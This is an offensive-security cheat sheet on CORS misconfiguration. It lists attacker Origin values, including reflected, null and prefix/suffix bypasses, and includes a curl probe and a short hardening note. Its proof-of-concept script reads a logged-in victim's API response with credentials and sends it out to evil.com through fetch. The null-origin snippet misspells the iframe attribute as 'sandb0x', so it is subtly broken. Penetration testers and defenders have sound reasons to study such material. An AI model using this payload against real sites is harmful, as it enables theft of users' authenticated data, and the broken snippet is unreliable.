CORS-MISCONFIGURATION
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Cross-Origin Resource Sharing controls which origins may read cross-site responses. Misconfigurations let a malicious site read authenticated data. Test only apps you are permitted to assess.
THE HEADERS#
Access-Control-Allow-Origin: <origin> | * # who may read the response Access-Control-Allow-Credentials: true # include cookies/creds Note: ACAO: * CANNOT be combined with credentials:true (browser blocks it). The danger is reflecting an arbitrary Origin WITH credentials:true.
TESTS (send Origin, inspect ACAO)#
1) Reflected origin + creds (critical):
Request: Origin: https://evil.com
Response: Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true
2) Null origin trusted:
Origin: null -> ACAO: null (reachable via sandboxed iframe/data: URL)
3) Pre-domain / suffix / substring logic flaws:
Origin: https://evil-target.com (prefix match bug)
Origin: https://target.com.evil.com (suffix match bug)
Origin: https://targetXcom (regex dot not escaped)
4) Weak regex allowing subdomain takeover domain, or http:// when site is https.
5) Wildcard subdomain + an XSS on any subdomain -> read main app data.
PROOF OF CONCEPT (reflected origin + creds)#
<script>
var x=new XMLHttpRequest();
x.open('GET','https://target.com/api/me',true);
x.withCredentials=true;
x.onload=function(){ fetch('https://evil.com/c?d='+encodeURIComponent(x.responseText)); };
x.send();
</script>
Host on your origin; a logged-in victim visiting it leaks their data.
'null' origin PoC: host inside <iframe sandb0x="allow-scripts" src="data:text/html,...">.
CURL QUICK CHECK#
curl -s -I -H "Origin: https://evil.com" https://target.com/api/ | grep -i access-control # look for the reflected origin + allow-credentials: true
HARDENING (blue-team note)#
Use a strict allowlist (exact string match), never reflect arbitrary Origin, never return ACAO:* with credentials, reject 'null', and don't rely on startsWith/endsWith/regex matching of the Origin.